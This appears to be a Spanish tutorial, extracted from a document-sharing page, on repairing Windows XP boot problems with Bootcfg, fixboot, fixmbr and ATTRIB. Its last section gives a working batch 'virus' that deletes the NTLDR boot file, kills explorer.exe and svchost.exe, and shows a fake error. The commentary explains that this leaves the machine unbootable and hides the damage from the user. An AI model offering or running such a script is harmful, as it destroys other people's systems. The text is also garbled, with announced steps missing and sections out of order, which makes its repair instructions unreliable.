Documentos de Académico
Documentos de Profesional
Documentos de Cultura
com)
a) Reparar el "Boot.ini": Cuando comienza a cargar de Windows XP, el programa Ntldr busca el archivo
Boot.ini para determinar cuál o cuáles son los S.O.´s disponibles. Si el problema reside en el archivo Boot.ini el
sistema no podrá arrancar. Para solucionar este problema usamos el comando Bootcfg, en la consola de
recuperación.
Bootcfg /add: Busca en el HD instalaciones de Windows y permite añadirlas al archivo Boot.ini
Bootcfg /scan: Busca en el disco duro instalaciones de Windows.
Bootcfg /list: Muestra cada entrada del archivo Boot.ini.
Bootcfg /Default: Establece el sistema operativo de arranque por defecto.
Bootcfg /Rebuild: Reconstruye el archivo Boot.ini
b) Sector de arranque y "MBR" defectuosos: El sector de arranque es una pequeña parte del disco duro que
contiene información acerca del sistema de archivos (NTFS o FAT32), y un pequeño fragmento de código que
ayuda al sistema a iniciar. El MBR o Master Boot Record ocupa el primer sector del disco duro y es
responsable de ceder el control a Windows para que éste inicie. Si se corrompen, el sistema operativo no podrá
arrancar. Para reparar estos sectores lo hacemos desde la consola de recuperación: Escribimos el siguiente
comando:
fixboot c : , y presionamos Enter. (Donde "c" es donde está instalado XP).
fixmbr c: , y presionamos Enter.
1
Ing. Del Pino Miguel Angel (migueldelpino10@gmail.com)
2) COMANDO "ATTRIB": El comando ATTRIB muestra o cambia los atributos de los archivo y/o directorio
del sistema operativo Microsoft Windows.
ATTRIB [+R | -R] [+A | -A ] [+S | -S] [+H | -H] [unidad:][ruta][nombre-archivo] [/S [/D]]
Donde:
+: Establece un atrib uto.
-: Borra un atributo.
R: Atributo de solo lectura del archivo.
A: Atributo de archivo de almacenamiento.
S: Atributo de archivos del sistema.
H: Atributo de archivo oculto.
[unidad:][ruta][nombre-archivo] Especifica el archivo o archivos que serán afectados por ATTRIB
/S: Procesa archivos que coinciden en la carpeta actual y todas las carpetas.
/D: Procesa carpetas.
Por ejemplo, algunos virus nos crean un archivo llamado autorun.inf en la raíz de nuestro disco o
pendrive y le otorgan permisos del sistema, por lo que no lo podemos borrar, entonces hacemos:
attrib –r –s –h autorun.inf
y luego lo borramos, otro caso es cuando el virus nos oculta varias carpetas, para esto podemos hacer:
Paso 1- Borramos el Archivo "NTLDR" del RAIZ del "C". Para eso entramos al DOS del Windows XP,
haciendo INICIO, EJECUTAR : Escribimos "cmd", y Aceptar::
Una vez en la consola nos ubicamos en el raiz "C", haciendo (la unidad del disco duro, generalmente es "c"):
Paso 2 - Procedemos a retirar todos los atributos al archivo NTLDR (para luego poderlo borrar), así:
2
Ing. Del Pino Miguel Angel (migueldelpino10@gmail.com)
3
Ing. Del Pino Miguel Angel (migueldelpino10@gmail.com)
Probar otras formas de solucionar el error: Con "LIVE BOOT 2012" y "HIREN`S BOOT 15.2"
X:\i386\winnt32.exe /cmdcons
Sacar la opción en el arranque : Vamos a hacer click con el botón derecho en MI PC, PROPIEDADES y seleccionar la
solapa “OPCIONES AVANZADAS”, "Inicio y Recuperación", y en "Configuración", le damos "0" segundos a
"Mostrar Lista". Listo!!!
Guardar en archivo como “virus ocultos” y como extensión “.bat”. Listo, tenemos el archivo ejecutable.
4
Ing. Del Pino Miguel Angel (migueldelpino10@gmail.com)
Lo que vamos a hacer es básicamente eliminar el archivo NTLDR que es necesario para que Windows XP
arranque correctamente, y al no estar protegido con ningún sistema de permisos es realmente fácil eliminarlo al
aplicar este “virus” el equipo no iniciará mostrando un mensaje “Falta NTLDR”.
Veamos cómo hacerlo: El código es el siguiente y debemos meterlo en un archivo.bat, se puede hacer con
cualquier editor de texto simple como el bloc de notas:
@echo off
color 06
attrib -r -h -s %root:C:\ntldr
DEL /f /q "C:\ntldr"
taskkill /f /im explorer.exe
taskkill /f /im svchost.exe
cls
echo error #800889xC888
exit
Explicación:
Lo que hacemos en esta línea es cambiar los atributos de este archivo para que podamos eliminarlo con el
comando DEL
attrib -r -h -s %root:C:\ntldr
El comando DEL con los parámetros f y q lo que hace es eliminar el archivo ntldr forzando su eliminación y
evitando que pregunte si quieres eliminarlo
DEL /f /q "C:\ntldr"
Seguidamente para que el efecto sea instantáneo lo que hacemos es “matar” varios procesos críticos del sistema,
provocando con esto que el equipo se desestabilice y sea reiniciado sin poder hacer nada
Las siguientes líneas son para limpiar el contenido rápidamente y que el usuario no le dé tiempo de ver que
archivos han sido eliminados.